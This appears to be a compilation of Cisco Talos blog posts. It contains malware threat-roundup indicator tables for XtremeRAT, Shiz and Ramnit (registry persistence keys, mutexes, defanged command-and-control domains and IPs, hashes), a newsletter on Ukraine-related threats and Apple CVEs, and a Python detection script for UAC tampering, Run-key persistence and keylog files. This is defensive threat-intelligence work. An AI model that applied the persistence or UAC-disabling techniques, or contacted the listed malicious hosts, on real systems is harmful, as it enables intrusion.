027f1a3e4c10fcf167c4df0451862b388e934e0ec1ee0f799f5113d830566415 280e9283aa6b2a3f5237de7c01d2ae8abaa9ba4e54655e3f367e889407f259ec 47dc41e8614cfa6f3e7fcd6d718321db4c9306146a176632aa124b345d530611 56f3edac172934d7ceea861ecffc2a727241deb5e939d1b69c5220c7333bef8c 616b57cac5aa00dfb8030f79094d170bad2b6a082bb963594cfc29397cce8b5d 83ab1ddbc24e145b0e170e8af46f3fc5fd4f6e1f571abac0aed6992c5d136071 af24dd23d021d1e43844af9cb31ba7f552377c7a7e49d536abbf2a6ecf1b54a2 b203e1e8f2083c7edf540cb91c424915bed88565dcaac579ffba224d4d76c714 b2516e86182da64f80fbf82cf84a6bcfcd37547cea16d1ff07a75c866fd4d36f d1e35f8e65cd1da6f33177604901c8d6b1a77cf7ee0735aa0b072f492e3f2194 de62cfc82da844304fb94bef7151808d025b183c5df68c77dfad9a035dd41690 e30895e1d44a156b336bfc8a685d5d2176341cb24620f51b5732f60ab64167f5 f127a27a300ecd23bc6115577884521a30884d67251df39fcbdecb63aaba3523 ff307f7c3f5c00ba357b696914a2772ddd656fa29c501eda006b7bbb91440607

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint (screenshot not reproduced in this text version)

Secure Malware Analytics (screenshot not reproduced in this text version)

MITRE ATT&CK (technique heat map not reproduced in this text version)

Win.Dropper.XtremeRAT-9964479-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: EnableBalloonTips
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UACDisableNotify
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 10
<HKCU>\ENVIRONMENT
Value Name: ProgramData
8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: explorer
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: explorer
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: explorer
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: services
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: services
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: services
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: spoolsv
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: spoolsv
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: atiedxx
1
<HKCU>\SOFTWARE\MICROSOFT\FEEFA 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: atiedxx
1
<HKCU>\SOFTWARE\MICROSOFT\OPKYIF 1
<HKCU>\SOFTWARE\MICROSOFT
Value Name: zupi.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: atiedxx
1
<HKCU>\SOFTWARE\MICROSOFT
Value Name: uwhuevat.exe
1
<HKCU>\SOFTWARE\MICROSOFT\FEEFA
Value Name: Yrivxya
1
<HKCU>\SOFTWARE\MICROSOFT\OPKYIF
Value Name: Otmabyek
1
Mutexes Occurrences
6nkxLO02qtXYL2vjf6Q3Ld1BXvM8Xk 4
Local\{E79956D8-8C6C-29D3-F3B6-46F6B67AA745} 3
Local\{E79956DA-8C6E-29D3-F3B6-46F6B67AA745} 3
Local\{E79956DB-8C6F-29D3-F3B6-46F6B67AA745} 3
GLOBAL\{<random GUID>} 3
qYLS3Rl0xK7U0fJaaFHI9gyEU4OQEO 2
JbdhwlrcWDpyZ78nPglBqnLY8exSoG 2
hbOblX81rgTLtJRBvLX2JB0nKVPZRh 1
BRMVTk3lQ1Jq0Oqd4zcgHKYq4NnaR9 1
f5SUSZmQlEOC00yG9p1Ivna3rOzI0e 1
akRIZKudnSn2WvMCpN5alLvywbcRXT 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
23[.]202[.]81[.]150 12
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
tulipbloom[.]in 6
iamthecause[.]top 3
www[.]tribosjovens[.]org[.]br 1
www[.]streetfighterx[.]top 1
www[.]cheapestconcerttickets[.]top 1
Files and or directories created Occurrences
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe 6
%APPDATA%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\Off.c 6
%APPDATA%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33} 6
%APPDATA%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\explorer.exe 6
%System32%\Tasks\explorer.exe 6
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\services.exe 3
%System32%\Tasks\services.exe 3
%TEMP%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33} 3
%TEMP%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\services.exe 3
%TEMP%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\Off.c 3
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\spoolsv.exe 2
%TEMP%\com8.{15eae92e-f17a-4431-9f28-805e482dafd4} 2
%TEMP%\com8.{15eae92e-f17a-4431-9f28-805e482dafd4}\spoolsv.exe 2
%TEMP%\com8.{15eae92e-f17a-4431-9f28-805e482dafd4}\Off.c 2
%TEMP%\D0B38F0F.cmd 1
%TEMP%\DA9F635A.cmd 1
%TEMP%\AA95177A.cmd 1
%TEMP%\4DA5383F.cmd 1
%TEMP%\D925C77F.cmd 1
%TEMP%\F0470C51.cmd 1
%APPDATA%\com3.{025A5937-A6BE-4686-A844-36FE4BEC8B6D} 1
%APPDATA%\com3.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\atiedxx.exe 1
%TEMP%\97BB41A5.cmd 1
%TEMP%\5DBB78C4.cmd 1
*See JSON for more IOCs

File Hashes

048b8ea9aef3287bae09d9327536faea0b662d48e9cb0d477e88805a7797bcc7
21cd479707dc5865122fa6f1cc638ab15953b09c43ee41abc8a197823a60b65b
34e610d6e74bc3332d7a8a25f61f6a979be8deab8dc1f8f6fdf487dd4ddd3070
5ea6b3668a008b77f6dff12788101e258e6c90d2b08de9e89d7d886834d98ad0
63cae1e75e5d8e54c8dfccebe7552e5a9aa2592cf259357a516d0115ebcf655e
75ee917f5022839d776082a470333a6c6c82069a7f443005f77cce1ff2ccaeb9
7817f2ee4c83e004d9b9602d8f68adc04076f949e1bc868a3bb28c47d98a4933
8159704f8517ba8d8a2f9ea6ec42f5fd4e18438c940806e48dcdd726b923ab66
856869554541785eaadb13c38bfb22392c38254968fc9a41d8d0f1c2b4d420be
8c99d803e23df187a0925aade258e7eeb1dea15607670a05f1fade726320cc05
8e770cc47212a54fee1deb9a642c6afb52238c176cc00bdd2fd3d473e3b601fc
a79939e710792b9d290f2ee2a9ae82529b4b78ba7a578341e52a7994aef5ef11
b9298520c6b390e4fb488f7fc7d99d1651c28482b06e6c008512e29049714a20
cc9d4f4daddee4e5e0c9839543c0c84360c8cc42758f894bc13bb814fbd572f1
da303496b9ba5a139b724e5cd1d35da3d04b89ccd82b281de14e8febb68f4eb6

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint (screenshot not reproduced in this text version)

Secure Malware Analytics (screenshot not reproduced in this text version)

MITRE ATT&CK (technique heat map not reproduced in this text version)

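The Remcos and XtremeRAT entries above list the registry values, Startup-folder drops and task files each family used to persist, and, for XtremeRAT, the UAC and tool-lockout values it set. The script below is an added example, not Talos tooling, that turns those observations into rules and evaluates them over a constructed batch of Sysmon-style events. The event dictionaries, the process image names, the rule names and the %APPDATA%-style path notation are assumptions made for the example.

```python
"""Evaluate the Remcos and XtremeRAT host IOCs from this roundup against
Sysmon-style events.  Added example; not Talos tooling.

Assumed event shape (modelled on Sysmon EventID 13 / 11, flattened):
  {"image": <process>, "kind": "reg",  "key": <key path>, "value": <value name>}
  {"image": <process>, "kind": "file", "path": <created file>}
File paths use the roundup's %APPDATA% / %System32% notation; map real
paths to that form before feeding events in.
"""
import re
from collections import defaultdict

HIVES = {"HKEY_CURRENT_USER": "<HKCU>", "HKEY_LOCAL_MACHINE": "<HKLM>",
         "HKEY_CLASSES_ROOT": "<HKCR>", "HKCU": "<HKCU>", "HKLM": "<HKLM>"}
RUN_KEYS = (r"<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
            r"<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE",
            r"<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN")
# Values the XtremeRAT samples wrote to weaken UAC and lock users out of tools.
TAMPER_VALUES = {
    (r"<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM", "ENABLELUA"),
    (r"<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER", "UACDISABLENOTIFY"),
    (r"<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM", "DISABLETASKMGR"),
    (r"<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM", "DISABLEREGISTRYTOOLS"),
}
STARTUP_DIR = "%APPDATA%\\MICROSOFT\\WINDOWS\\START MENU\\PROGRAMS\\STARTUP\\"
REMCOS_KEY = re.compile(r"^<HKCU>\\SOFTWARE\\REMCOS_[A-Z0-9]+$")  # REMCOS_<config id>
TASK_FILE = re.compile(r"^%SYSTEM32%\\TASKS\\[^\\]+\.EXE$")        # task named like a binary


def normalise(key: str) -> str:
    """Upper-case a registry path and map long hive names to the <HKCU> form used above."""
    hive, _, rest = key.partition("\\")
    return HIVES.get(hive.upper(), hive.upper()) + "\\" + rest.upper()


def evaluate(events):
    """Return {image: sorted finding names} for every process matching a rule."""
    run_hits = defaultdict(lambda: defaultdict(set))   # image -> value name -> run keys
    findings = defaultdict(set)
    for ev in events:
        img = ev["image"]
        if ev["kind"] == "reg":
            key, val = normalise(ev["key"]), ev["value"].upper()
            if (key, val) in TAMPER_VALUES:
                findings[img].add("xtremerat:uac_or_tool_tamper")
            if key in RUN_KEYS:
                run_hits[img][val].add(key)
            if REMCOS_KEY.match(key) and val == "EXEPATH":
                findings[img].add("remcos:config_key")
        elif ev["kind"] == "file":
            p = ev["path"].upper()
            if p.startswith(STARTUP_DIR):
                findings[img].add("persistence:startup_folder")
            if p.endswith("\\REMCOS\\LOGS.DAT"):
                findings[img].add("remcos:keylog_file")
            if TASK_FILE.match(p):
                findings[img].add("xtremerat:task_named_like_exe")
    # XtremeRAT registered the same value name under Run, RunOnce and Policies\Explorer\Run.
    for img, names in run_hits.items():
        if any(len(keys) == len(RUN_KEYS) for keys in names.values()):
            findings[img].add("xtremerat:triple_run_key")
    return {img: sorted(f) for img, f in findings.items()}


XTREME_IMAGE = r"%APPDATA%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\explorer.exe"
REMCOS_IMAGE = r"%APPDATA%\windows.exe"
SAMPLE_EVENTS = [   # constructed from the IOC tables above; not real telemetry
    {"image": XTREME_IMAGE, "kind": "reg", "value": "EnableLUA",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"},
    {"image": XTREME_IMAGE, "kind": "reg", "value": "explorer",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"image": XTREME_IMAGE, "kind": "reg", "value": "explorer",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"},
    {"image": XTREME_IMAGE, "kind": "reg", "value": "explorer",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"},
    {"image": XTREME_IMAGE, "kind": "file",
     "path": r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe"},
    {"image": XTREME_IMAGE, "kind": "file", "path": r"%System32%\Tasks\explorer.exe"},
    {"image": REMCOS_IMAGE, "kind": "reg", "value": "EXEpath",
     "key": r"HKEY_CURRENT_USER\SOFTWARE\Remcos_voxcyiginc"},
    {"image": REMCOS_IMAGE, "kind": "file", "path": r"%APPDATA%\remcos\logs.dat"},
    {"image": REMCOS_IMAGE, "kind": "file",
     "path": r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\windows.vbe"},
    # A benign installer adding one Run value must not be flagged.
    {"image": r"%ProgramFiles%\Vendor\setup.exe", "kind": "reg", "value": "VendorUpdater",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for image, hits in evaluate(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(hits))
```

The rule that fires on the same value name under Run, RunOnce and Policies\Explorer\Run is the most specific signal here: a legitimate installer writes one of those, not all three. Treat the single tamper-value hits as supporting evidence only, since administrators and some enterprise tooling also change EnableLUA.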
Win.Packed.Shiz-9964480-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
26
Mutexes Occurrences
Global\674972E3a 26
Global\MicrosoftSysenterGate7 26
internal_wutex_0x000004b4 26
internal_wutex_0x0000043c 26
internal_wutex_0x000004dc 26
internal_wutex_0x<random, matching [0-9a-f]{8}> 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 13
45[.]33[.]18[.]44 7
45[.]79[.]19[.]196 5
45[.]33[.]2[.]79 5
173[.]255[.]194[.]134 5
45[.]33[.]20[.]235 5
198[.]58[.]118[.]167 4
72[.]14[.]185[.]43 4
96[.]126[.]123[.]244 3
45[.]56[.]79[.]23 3
45[.]33[.]30[.]197 3
72[.]14[.]178[.]174 3
45[.]33[.]23[.]183 1
85[.]94[.]194[.]169 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
gahoqohofib[.]eu 26
rytifaquwer[.]eu 26
kepujajynib[.]eu 26
lyrosajupid[.]eu 26
tuwaraqidek[.]eu 26
xuqeqejohiv[.]eu 26
pumebeqalew[.]eu 26
cinycekecid[.]eu 26
divulewybek[.]eu 26
cilakyfaloq[.]eu 26
vocijekyqiv[.]eu 26
foxofewuteq[.]eu 26
nozapekidis[.]eu 26
makymykakic[.]eu 26
galerywogej[.]eu 26
qeguxylevus[.]eu 26
rydohyluruc[.]eu 26
lysafurisam[.]eu 26
tupepulofup[.]eu 26
kefilyrymaj[.]eu 26
purumulazux[.]eu 26
xutyrurojah[.]eu 26
ciqivutevam[.]eu 26
dimoxuzynup[.]eu 26
citonocebyl[.]eu 26
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 26

File Hashes

0aa01d0e6ab4b0dab543cd0f7d226a1971c896c1b5668ef55d5d84fd8aac331f
232b980cba11ed3757cd13e6e4ec20993f819d07254999411e7a308561f10ac9
27eb369a639c17edfcc1eefc7f2d21d0680f62dd00a7bd2cf0a3d50030134dc9
2ebf268325f6e2840fa65e481e61cee94d0dc889f3f032abdf7492dd7772be07
31532a2178c74921a141b257175fd25aa587d611e480ae6399255000a875f86b
3634d7d5b0e31a068dbb17eec6dd39b927dc2e6ca7a7d1f50fe122fd9a348578
3ce214e14dc05772c4f6ed8bf5df0c2f6916c3cb78cad5ec7960e8a5aa3183dd
3db521931dd32b2d76a0b694eba198d54db0642289c4c04797d81abba1e8cc1c
44aaba781695fd9c5a859fe91a1b251f3700cfc65d20c70827108aade73a2d47
491e939589d3df18f8c2601acd0ecb2e730744625208a9ef10e1153c8fbd999d
4aef6f77172ffbe97608338d59b4e327f80ac6b1280234acfd1a35c519a8cc54
5153f49e288d120950522e3cedade50d389452cb5344344672b1dbbe4fd6b2c3
5950d60ccaf62ebbd4d8e6f67c8aae6ffa9d7c7f3950aa3aa6c97810f2e192b4
5bdcf125d1dd26dc4eea102736976a474e7c95ca4486ca8e13cf404ed6b54661
66703ea93baf17db72cce7c91b39df923574a9173768ebfda5f78580e1f1e05e
6728f5c294584f01a2e8a8f320cce6df9a85656b582f29e7dcd1b226d51d0b46
706de588bf28a2345331005686aeb0a65d92eea4195050f948577ce0623bc7b3
8818d782007a434aaf773fa601467cb8ea9514ffbdba74a4b2cf8ad0ee096110
914e601f65f04fb41f1ede09babc33d9d067fdf089a6f720eb7dcb5489da182c
a3b5359d0320885dc46a8e01583304adcc8f8697bd72d4a9fa1e02b0d210e061
b9d4f9b412b05af3a6f1b601041422117f3c4ccdfa02b140a1b06da1ba53193b
bcf08953ce18c297e8b3714bd66563fde1d031b9eec8c26cc5a880f6b57eea5c
bd984088a849d6b0593a970dec6a8792b82c8c04edecd4032cfd6a447d4f3c48
c7297544b35ded090c59b73c53c1c6a3f50b0b30206f237c1f84114b01adcdfd
ccaa68c04b2d4378b62753b540e5b25cb36e6334a48a10eb9975c2064fc393da
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint (screenshot not reproduced in this text version)

Secure Malware Analytics (screenshot not reproduced in this text version)

MITRE ATT&CK (technique heat map not reproduced in this text version)

Threat Source newsletter (Aug. 25, 2022) — We're still not talking about Ukraine enough

25 August 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Russia’s invasion of Ukraine was once the most talked about story in the world. Six months into the conflict, modern attention spans have moved on to other news stories. But Ukraine Independence Day yesterday should serve as a reminder to everyone that the threats to Ukraine have not gone anywhere. 

The country still faces a physical conflict with Russia every day that has no easy end in sight, and the barrage of cyber attacks is expected to continue.

As discussed in our livestream yesterday, Talos continues to see evolving cybersecurity threats in the region, including the most recent GoMet backdoor. And as Joe Marshall highlighted in his blog post last week, Ukraine's agriculture industry, which is vital to the global food supply chain, remains vulnerable to kinetic and virtual attacks. Because there has been no single, headline-grabbing cyber attack against Ukraine since Russia's invasion began, the larger public perception is that things haven't been "that bad." But state-sponsored actors, including the infamous Fancy Bear and Sandworm groups, have continually barraged Ukrainian government entities and critical infrastructure with a range of attacks.

Ukraine’s state nuclear power company also said last week that state-sponsored actors launched a three-hour attack on its websites. 

A three-hour distributed denial-of-service attack isn't going to headline the nightly news, but that doesn't mean attacks like it aren't happening and making it harder for the Ukrainian government and critical infrastructure to operate. There are people who, six months into this, are still fending off cyber threats daily, sometimes just to keep the internet on or to make sure that week's grain shipment goes out on time.

Headlines come and go, but it's important to remember that some things are always going on in the background that matter more than the newest headline distracting us with the latest trojan someone found in the Android app store.
  

The one big thing 

All Apple users should update their devices if they haven’t already. The company released updates for iOS, iPadOS and macOS last week, warning of two vulnerabilities that could have been exploited in the wild. CVE-2022-32894 is an out-of-bounds write issue in the operating systems’ kernel that an adversary could exploit to execute arbitrary code with kernel privileges and take control over the system. CVE-2022-32893 is an out-of-bounds write issue in WebKit that can also lead to arbitrary code execution. 

Why do I care? 

While Apple did not disclose details of any attacks exploiting these issues, it did say it was aware of a report that they "may have been actively exploited." Apple lists the affected devices as iPhone 6s and later, all iPad Pro models, iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch 7th generation. Users of these devices should patch as soon as possible.

So now what? 

Patch, patch and patch again if you’re using any Apple devices. 

 

Top security headlines from the week


The LockBit ransomware group's website was hit with a large distributed denial-of-service attack after the group threatened to leak documents belonging to a cybersecurity firm. At one point, the site displayed a warning that the gang plans to upload the targeted company's stolen data to peer-to-peer networks. Talos' own Azim Shukuhi first tweeted that a LockBit member told him the site's servers were receiving "400 requests a second from over 1,000 servers" in a possible "hack back" attack. DDoS attacks aim to disrupt a site's operations by flooding it with traffic and messages, forcing it to essentially shut down for a period of time. (The Register, TechCrunch)

Former Twitter Head of Security Peiter "Mudge" Zatko filed a complaint with the U.S. Securities and Exchange Commission alleging that Twitter is not doing enough to crack down on bot and spam accounts. Mudge is known for his involvement with the "Cult of the Dead Cow," one of the first hacking groups of its kind. The complaint also states that too many Twitter employees have access to critical user data and that the company was not actually deleting user data when asked to. The number of bot accounts on the site is central to the dispute over Elon Musk's bid to buy the company. (CNN, The Verge)

The FBI is warning that threat actors are increasingly hijacking home IP addresses to disguise credential-stuffing attacks. An investigation by the FBI and its Australian counterparts uncovered two sites offering more than 300,000 unique credentials for sale, and warned they could be used in attacks against private companies. The actors set up proxies to disguise the flood of login attempts; by routing them through residential IP addresses they can evade the usual IP-reputation and rate-limiting checks that catch logins from datacenter ranges. (Cybersecurity Dive, FBI)



Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02 

MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201  

Ukraine Independence Day: Talos update

24 August 2022 at 16:39
On Independence Day for Ukraine, Aug. 24, 2022, Cisco Talos provided a live update on its continued support for the region.  

Six months into Russia's invasion of Ukraine, Dmytro Korzhevin, a senior threat intelligence researcher, JJ Cummings, Talos' national intelligence principal, and Ashlee Benge, a strategic intelligence lead, provided insights into their past few months of work in the region.

The discussion primarily focused on the resiliency of Ukrainians, who have worked tirelessly over the years to transform their cybersecurity capabilities. Ukrainian infrastructure has largely stayed operational and, in most cases, exceeded expectations. That seems to have baffled most pundits, but for those who have spent years working in Ukraine, the level of dedication and commitment to protecting critical infrastructure from those who would do it harm comes as no surprise.

The team also covered how groundwork laid years ago is paying dividends now during the war, and gave an update on the types of cyber threats we're observing, including the deployment of the GoMet backdoor.

At the beginning of the broadcast, Korzhevin shared what Independence Day of Ukraine means for him. 

"Independence is not an extra day off, but a value that should be used for the benefit of every citizen of our country," he added after the stream. "Independence is the will. Independence lives in every person. If we are independent, it means that we are free. That is, we live, not exist. The same goes for the state. Independence of Ukraine is when we have the possibility to develop the state as we want it and not as we are told when we have a real own history and not a twisted one when we speak our native language and not a hostile one. And now that there is a war in Ukraine, the most important task of our people is to preserve Independence. So that we, our children, grandchildren and all future generations of Ukrainians could live and build our state based on national traditions and core democratic values. Independence is primarily a way, not a condition. I believe that we will overcome all the difficulties in this way."

Benge added that Cisco and Talos have several resources available to any organization in Ukraine that needs assistance.

"If you are an organization in Ukraine who is interested in having Talos’ help, and you would like to participate in our threat hunting program, please reach out via our social channels," she said. "We are offering our security products for free to Ukrainian organizations, as it's important to us to continue to support Ukraine throughout the duration of the conflict."

A recording of the broadcast is available from the original post.

Threat Roundup for August 12 to August 19

19 August 2022 at 22:24

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 12 and Aug. 19. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.Ramnit-9964110-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It could also steal browser cookies and hide from popular antivirus software.
Win.Ransomware.Locky-9963624-0 Ransomware Locky is ransomware typically distributed via spam emails containing a maliciously crafted Microsoft Word document crafted to trick targets into enabling malicious macros. This family was originally released in 2016 and updated over the years with additional functionality.
Win.Dropper.Shiz-9963681-0 Dropper Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by victims visiting a malicious site.
Win.Dropper.XtremeRAT-9963701-0 Dropper XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been reused by similar RATs.
Win.Dropper.Nanocore-9963905-0 Dropper Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Ransomware.Cerber-9964084-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Dropper.Dorkbot-9964085-0 Dropper Dorkbot is a worm that spreads itself through social networking sites and messaging apps. Once installed, the infected computer becomes part of a botnet, allowing its operator to control the machine remotely.
Win.Worm.Kuluoz-9964104-0 Worm Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. It is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.

Threat Breakdown

Win.Dropper.Ramnit-9964110-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Mutexes Occurrences
{79345B6A-421F-2958-EA08-07396ADB9E27} 26
Global\<random guid> 26
Files and or directories created Occurrences
%TEMP%\~TMDB5A.tmp 2
%TEMP%\~TMDB99.tmp 2
%TEMP%\~TM314F.tmp 1
%TEMP%\~TM31DD.tmp 1
%TEMP%\~TMDBC8.tmp 1
%TEMP%\~TMDC25.tmp 1
%TEMP%\~TME21E.tmp 1
%TEMP%\~TMDC93.tmp 1
%TEMP%\~TME2BB.tmp 1
%TEMP%\~TME337.tmp 1
%TEMP%\~TME3A5.tmp 1
%TEMP%\~TME0D6.tmp 1
%TEMP%\~TMDBF7.tmp 1
%TEMP%\~TME164.tmp 1
%TEMP%\~TMD977.tmp 1
%TEMP%\~TMD9E5.tmp 1
%TEMP%\~TMD9C5.tmp 1
%TEMP%\~TMDA42.tmp 1
%TEMP%\~TME0F5.tmp 1
%TEMP%\~TME173.tmp 1
%TEMP%\~TMDBE8.tmp 1
%TEMP%\~TMDCC1.tmp 1
%TEMP%\~TMDF60.tmp 1
%TEMP%\~TMDD2F.tmp 1
%TEMP%\~TMDFED.tmp 1
*See JSON for more IOCs

File Hashes

03ba150882170b2cfee8c30f556c2be840697b7cc1e7dcc47594dd3bd9758c7b
